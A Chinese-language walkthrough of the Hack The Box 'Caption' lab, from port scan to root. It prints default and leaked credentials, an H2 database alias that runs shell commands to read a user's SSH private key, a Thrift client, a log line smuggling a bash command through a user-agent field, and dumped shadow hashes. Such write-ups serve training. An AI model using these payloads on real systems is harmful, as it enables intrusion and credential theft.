基本信息

端口扫描

22,80,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV -Pn 10.10.11.33
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-18 13:19 CST
Nmap scan report for caption.htb (10.10.11.33)
Host is up (0.096s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http-proxy HAProxy http proxy 2.0.0 or later
|_http-title: Caption Portal Login
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Werkzeug/3.0.1 Python/3.10.12
8080/tcp open http Jetty
|_http-title: GitBucket
Service Info: OS: Linux; Device: load balancer; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.15 seconds

80

需要加hosts:

1
10.10.11.33 caption.htb

需要登录:

8080

是一个GitBucket:

GitBucket

默认账号密码登录:

1
root : root

Logservice

看起来可能有命令注入:

Caption-Portal

查看commoits,历史版本配置文件中可以得到一组账号密码:

1
margo : vFr&cS2#0!

Caption-Portal

得到的账号密码可以登录80的Portal:

logs

访问是403:

GitBucket dbviewer(非预期)

GitBucket 自带的dbviewer功能可以执行sql,后端是H2数据库:

参考执行命令,得到margo私钥:

1
2
3
4
5
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;

CALL SHELLEXEC('id')

CALL SHELLEXEC('cat /home/margo/.ssh/id_ecdsa')

预期 user

预期方式是请求走私

  • 使用 H2CSmuggler 通过 HTTP2 升级绕过 HAproxy ACL
  • 毒化缓存并在 UTM_Source 跟踪器中放置 XSS 有效载荷
  • 获得管理员 Cookie,使用它通过 h2csmuggler 访问日志页面
  • 查看日志,发现有一个 margo 使用的 ecdsa 密钥
  • 谷歌搜索我们下载日志的 URL,发现其copyparty存在文件泄露漏洞
  • 然后读取私钥

参考:

user flag

使用得到的私钥登录:

信息

运行pspy64可以发现和log相关的东西,前面在gitbucket里也可以看到可能的命令注入:

thrift

另外LogService代码中也可以看到Thrift 文件:

参考文档,克隆项目后运行生成代码:

1
2
3
git clone http://caption.htb:8080/git/root/Logservice.git

thrift --gen py log_service.thrift

查看生成的代码可以确认是能够控制filePath调用log,端口是 9090也可以查看本地端口确认:

命令注入 & root flag

然后就可以自己根据代码逻辑创建恶意日志文件,然后自定义客户端连接服务,提交恶意日志,触发命令注入:

需要转发端口本地运行客户端,server上没python thrift库:

1
2
3
4
tar czvf gen-py.tar gen-py
scp -i margo_id_ecdsa margo@10.10.11.33:/tmp/miao/Logservice/gen-py.tar .

ssh -i margo_id_ecdsa margo@10.10.11.33 -L 9095:127.0.0.1:9090

client.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
transport = TSocket.TSocket('localhost', 9095)
transport = TTransport.TBufferedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = LogService.Client(protocol)
transport.open()

try:
log_file_path = "/tmp/miao/miao.log"
response = client.ReadLogFile(log_file_path)
print("Server response:", response)

except Thrift.TException as tx:
print(f"Thrift exception: {tx}")

transport.close()

if __name__ == '__main__':
main()

miao.log

1
127.0.0.1 "user-agent":"'; /bin/bash /tmp/miao/shell.sh  #"

shadow

1
2
3
root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::
margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::
ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::

参考资料